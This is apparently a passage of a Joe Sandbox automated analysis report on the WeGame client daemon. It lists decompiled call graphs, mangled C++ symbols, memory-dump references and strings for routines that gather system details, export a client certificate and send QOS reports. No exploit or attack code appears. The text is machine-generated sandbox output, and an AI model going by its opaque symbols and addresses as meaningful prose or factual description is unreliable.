                                                                • ?get_ie_version@Sys_wrapper@common@ierd_tgp@@SAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,?,00000001,000000C4,0045A022,00000000,00000000,00000000,00000000), ref: 0045A71D
                                                                • ?get_cpu_name@Sys_wrapper@common@ierd_tgp@@SAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,?,?,00000001,000000C4,0045A022,00000000,00000000,00000000,00000000), ref: 0045A726
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z.COMMON(?,?,StartFor,00000008), ref: 0045A768
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z.COMMON(?,?,IsHide,00000006,StartFor,00000008), ref: 0045A7B0
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                • ?IsLaptop@Sys_wrapper@common@ierd_tgp@@SA_NXZ.COMMON ref: 0045A814
                                                                • ?get_system_name@Sys_wrapper@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 0045A8A1
                                                                • ?get_system_hardware@Sys_wrapper@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 0045A8C3
                                                                • ?GetAllDriveInfo@Sys_wrapper@common@ierd_tgp@@SAXPAV?$vector@UDriveInfo@common@ierd_tgp@@V?$allocator@UDriveInfo@common@ierd_tgp@@@std@@@std@@@Z.COMMON(?), ref: 0045A959
                                                                  • Part of subcall function 0043D7E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0043D8C7
                                                                  • Part of subcall function 0045381E: __EH_prolog3_GS.LIBCMT ref: 00453825
                                                                • ?get_system_all_build_version@Sys_wrapper@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 0045AA4C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Sys_wrapper@common@ierd_tgp@@$V?$allocator@$D@std@@U?$char_traits@V?$basic_string@$D@2@@std@@$D@2@@std@@@Drive$?extract_op_from_cmd@H_prolog3__invalid_parameter_noinfo_noreturnmemmove$?get_cpu_name@?get_graphic_card_name@?get_ie_version@?get_system_all_build_version@?get_system_hardware@?get_system_name@H_prolog3Info@Info@common@ierd_tgp@@Info@common@ierd_tgp@@@std@@@std@@@Laptop@V?$vector@
                                                                • String ID: IsHide$StartFor
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0046123D
                                                                • ?is_certificate_open@util_curl_certificate@ierd_tgp@@YA_NXZ.COMMON(00000110,00464E97,00000070,0045A152), ref: 00461242
                                                                • ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,00000110,00464E97,00000070,0045A152), ref: 00461256
                                                                  • Part of subcall function 0045CBE9: __EH_prolog3_GS.LIBCMT ref: 0045CBF0
                                                                  • Part of subcall function 0045CBE9: ??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z.COMMON(?,00000024,00463EB7,?,00000000,?,?,log), ref: 0045CC20
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                • ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 0046135B
                                                                • ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 00461386
                                                                • ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 004613B1
                                                                • ?get_cert_pwd@util_curl_certificate@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 004613C8
                                                                • ?export_crt_file@util_curl_certificate@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@000@Z.COMMON(?,?,?,00000000,?,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 004613DE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 004613FD
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • wegamex_client.pfx, xrefs: 004612D0
                                                                • wegamex_client.key, xrefs: 00461299
                                                                • [export_curl_crt_file]export fail!, xrefs: 00461438
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 00461421
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?u16_to_loc@common@ierd_tgp@@D@2@@4@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$H_prolog3H_prolog3_$??_0path@filesystem@ierd_tgp@@?export_crt_file@util_curl_certificate@ierd_tgp@@?get_cert_pwd@util_curl_certificate@ierd_tgp@@?get_log_instance@base@@?get_workingdir_path_ex@?is_certificate_open@util_curl_certificate@ierd_tgp@@Application@common@ierd_tgp@@D@2@@std@@D@2@@std@@000@H_prolog3_catch_Logger@1@V012@V012@@Vpath@filesystem@3@_invalid_parameter_noinfo_noreturn
                                                                • String ID: [export_curl_crt_file]export fail!$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$wegamex_client.key$wegamex_client.pfx
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD4755D
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                • ?root_full_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,000001E8,6BD470FC,?,?), ref: 6BD47589
                                                                  • Part of subcall function 6BD4885B: __EH_prolog3_GS.LIBCMT ref: 6BD48865
                                                                  • Part of subcall function 6BD4885B: ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD4887F
                                                                  • Part of subcall function 6BD4885B: ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(?,?,?,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD488BA
                                                                  • Part of subcall function 6BD4885B: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,?,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD48922
                                                                  • Part of subcall function 6BD4885B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(00000000,?,?,?,00000000,?), ref: 6BD48934
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@Z.COMMON(?,00000000,?,files,00000005,?,?,?,?,?,?,?,?,000001E8,6BD470FC,?), ref: 6BD475C7
                                                                  • Part of subcall function 6BD46FC9: ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N3@Z.COMMON(?,?,?,00000001,00000000,?,6BD475CC,?,00000000,?,files,00000005), ref: 6BD46FD9
                                                                • ?u8_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@@Z.COMMON(?,?,?,?,0000002E,?), ref: 6BD4769E
                                                                • ?cfg_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,?,?,0000002E,?), ref: 6BD476D1
                                                                  • Part of subcall function 6BD4616F: __EH_prolog3_GS.LIBCMT ref: 6BD46176
                                                                  • Part of subcall function 6BD4616F: ?root_full_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 6BD46189
                                                                  • Part of subcall function 6BD4616F: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 6BD4619B
                                                                  • Part of subcall function 6BD4616F: ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?), ref: 6BD461AA
                                                                  • Part of subcall function 6BD4616F: ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?,?), ref: 6BD461B6
                                                                • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(?,?,00000000,?,?,?,0000002E,?), ref: 6BD476E6
                                                                  • Part of subcall function 6BD5FD7B: __EH_prolog3_GS.LIBCMT ref: 6BD5FD85
                                                                  • Part of subcall function 6BD5FD7B: ?is_absolute@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON ref: 6BD5FDA8
                                                                  • Part of subcall function 6BD5FD7B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(00000000), ref: 6BD5FE1D
                                                                  • Part of subcall function 6BD5FD7B: ?root_name@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,00000000), ref: 6BD5FE8E
                                                                  • Part of subcall function 6BD5FD7B: ?root_name@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,00000000), ref: 6BD5FE9E
                                                                  • Part of subcall function 6BD5FD7B: ?root_directory@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,00000000), ref: 6BD5FEAD
                                                                  • Part of subcall function 6BD5FD7B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(?,?,?,?,00000000), ref: 6BD5FEC2
                                                                  • Part of subcall function 6BD1D1A7: memmove.VCRUNTIME140(?,?,00000018,?,?), ref: 6BD1D1C5
                                                                  • Part of subcall function 6BD1D1A7: memmove.VCRUNTIME140(?,0000000F,00000018,?,?,00000018,?,?), ref: 6BD1D1CE
                                                                  • Part of subcall function 6BD1D1A7: memmove.VCRUNTIME140(0000000F,?,00000018,?,0000000F,00000018,?,?,00000018,?,?), ref: 6BD1D1DA
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6BD477C7
                                                                • relate path string to path fail, xrefs: 6BD477DE
                                                                • files, xrefs: 6BD475AA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$??0path@filesystem@ierd_tgp@@File_info@common@ierd_tgp@@V123@Vpath@filesystem@3@memmove$E@$$H_prolog3_V012@@Vpath@12@$?absolute@filesystem@ierd_tgp@@?get_cfg@common@ierd_tgp@@?root_full_path@?root_name@path@filesystem@ierd_tgp@@U?$char_traits@_U?$less@V12@V312@0@V?$allocator@_V?$basic_ptree@V?$basic_string@_Vpath@filesystem@2@W@std@@$?cfg_folder@?exists@filesystem@ierd_tgp@@?get_cfg_module_path@?is_absolute@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?root_directory@path@filesystem@ierd_tgp@@?u8_to_path@common@ierd_tgp@@?wstring@path@filesystem@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3H_prolog3_catch_Verror_code@std@@@Vpath@filesystem@2@@W@2@@std@@W@2@@std@@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp$files$relate path string to path fail
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD95CF0
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95CFF
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95D5D
                                                                • GetCurrentThreadId.KERNEL32 ref: 6BD95DEB
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD95E2D
                                                                • ?PushUniqueThreadAsyncTask@common@ierd_tgp@@YAIV?$function@$$A6AXXZ@std@@IK@Z.COMMON(?,?), ref: 6BD95EA1
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD95EB0
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                  • Part of subcall function 6BD918D2: __EH_prolog3.LIBCMT ref: 6BD918D9
                                                                  • Part of subcall function 6BD90F82: __EH_prolog3.LIBCMT ref: 6BD90F89
                                                                • ?PushUniqueThreadAsyncTask@common@ierd_tgp@@YAIV?$function@$$A6AXXZ@std@@IK@Z.COMMON(?,?,?,?,?,?,?,?,?,00000002,00000000,6BD43A1D), ref: 6BD95F1F
                                                                  • Part of subcall function 6BD31650: __EH_prolog3.LIBCMT ref: 6BD31657
                                                                • ?real_report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@@Z.COMMON(6BD43A1D,0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95F40
                                                                  • Part of subcall function 6BD952CF: __EH_prolog3_GS.LIBCMT ref: 6BD952D6
                                                                  • Part of subcall function 6BD952CF: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD952E8
                                                                Strings
                                                                • [qos_t]Offline mode, disable QOS report: %d., xrefs: 6BD95D3B
                                                                • [qos_t] qos report arrived, qos_kind = %d, xrefs: 6BD95DA0
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp, xrefs: 6BD95D23, 6BD95D84
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Similarity
                                                                • API ID: H_prolog3$?get_log_instance@base@@Logger@1@Thread$AsyncCnd_initH_prolog3_PushTask@common@ierd_tgp@@UniqueV?$function@$$Z@std@@std::_$?real_report@CurrentH_prolog3_catch_Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@@
                                                                • String ID: [qos_t] qos report arrived, qos_kind = %d$[qos_t]Offline mode, disable QOS report: %d.$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004626EE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054), ref: 004626FB
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,00000054), ref: 0046277D
                                                                • ?enable_app_session_end@common@ierd_tgp@@YAX_N@Z.COMMON(00000001,?,?,?,?,00000054), ref: 004627D6
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054), ref: 004627F1
                                                                • ?enable_app_session_end@common@ierd_tgp@@YAX_N@Z.COMMON(00000001,00000054), ref: 00462851
                                                                • ?exit_app@Application@common@ierd_tgp@@QAEXH@Z.COMMON(00000001,00000054), ref: 00462860
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • DefWindowProcA.USER32(?,?,?,?,00000054), ref: 00462873
                                                                Strings
                                                                • [main] query end session, shutdown!, xrefs: 0046282C
                                                                • [main]OnRecvMsg2, msg:%x, wParam:%d, xrefs: 0046273A
                                                                • [main] ending session, shutdown!, xrefs: 004627B8
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 00462722, 004627A1, 00462815
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$?enable_app_session_end@common@ierd_tgp@@$?exit_app@Application@common@ierd_tgp@@H_prolog3H_prolog3_H_prolog3_catch_ProcWindow
                                                                • String ID: [main] ending session, shutdown!$[main] query end session, shutdown!$[main]OnRecvMsg2, msg:%x, wParam:%d$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDCD034
                                                                • memset.VCRUNTIME140(?,00000000,00000208,\config\client_info.info,000003E0,6BD8DDB1,?,6BDB2AD3), ref: 6BDCD093
                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000104,?,?,6BFAE570), ref: 6BDCD0A8
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,?,6BFAE570), ref: 6BDCD0AF
                                                                • PathFileExistsW.SHLWAPI(?), ref: 6BDCD1A4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Similarity
                                                                • API ID: FileModule$ExistsH_prolog3_HandleNamePathmemset
                                                                • String ID: \config\client_info.info$client_id
                                                                • API String ID: 3144288800-1673508345
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD95AC9
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000003,00000001,0000011C,6BD954F0,00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45), ref: 6BD95B1F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000002,00000000,?), ref: 6BD95BC7
                                                                • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(00000001,00000000,00000000,00000002,00000000,?), ref: 6BD95C24
                                                                  • Part of subcall function 6BD926A1: __EH_prolog3_GS.LIBCMT ref: 6BD926AB
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD926C1
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?), ref: 6BD926D1
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5), ref: 6BD926DF
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745), ref: 6BD926ED
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,00000002,00000000,?), ref: 6BD95C41
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000011C,6BD954F0,00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45,6BD43A1D,0000009C), ref: 6BD95C6B
                                                                • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(00000001,6BD43A1D,00000000,0000011C,6BD954F0,00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C), ref: 6BD95CD4
                                                                  • Part of subcall function 6BD261B6: ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(1F5A0D44,00000001,?,00000000,6BF78988,000000FF,?,6BD46F19,00000010,00000003,00000001,000000B4,6BD45267,00000000,?,?), ref: 6BD2620D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$?get_log_instance@base@@Logger@1@$Concurrency::details::platform::__D@std@@@std@@H_prolog3_ObjectRegisterSingleU?$char_traits@Wait$??1?$basic_ios@??1?$basic_iostream@
                                                                • String ID: cannot report qos$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp$handle is invalid, cannot report qos
                                                                • API String ID: 1310799271-1232453792
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9648F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000,00000001), ref: 6BD964E1
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,6BD43A1D,00000000,00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD96578
                                                                • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(00000001,6BD43A1D,00000001,00000001,6BD43A1D,00000000,00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?), ref: 6BD965D3
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000002,00000000,?), ref: 6BD965F0
                                                                  • Part of subcall function 6BD926A1: __EH_prolog3_GS.LIBCMT ref: 6BD926AB
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD926C1
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?), ref: 6BD926D1
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5), ref: 6BD926DF
                                                                  • Part of subcall function 6BD926A1: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745), ref: 6BD926ED
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000001,6BD43A1D,00000000,00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD96610
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C), ref: 6BD9661A
                                                                • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(00000001,6BD43A1D,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000), ref: 6BD9667E
                                                                  • Part of subcall function 6BD261B6: ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(1F5A0D44,00000001,?,00000000,6BF78988,000000FF,?,6BD46F19,00000010,00000003,00000001,000000B4,6BD45267,00000000,?,?), ref: 6BD2620D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$?get_log_instance@base@@D@std@@@std@@Logger@1@U?$char_traits@$??1?$basic_ios@Concurrency::details::platform::__H_prolog3_ObjectRegisterSingleWait$??1?$basic_iostream@
                                                                • String ID: cannot report qos by http$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp$handle is invalid, cannot report qos
                                                                • API String ID: 123105886-177249518
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDB5864
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,000002DC), ref: 6BDB591E
                                                                  • Part of subcall function 6BDAB9D8: __EH_prolog3_GS.LIBCMT ref: 6BDAB9DF
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,000002DC), ref: 6BDB5930
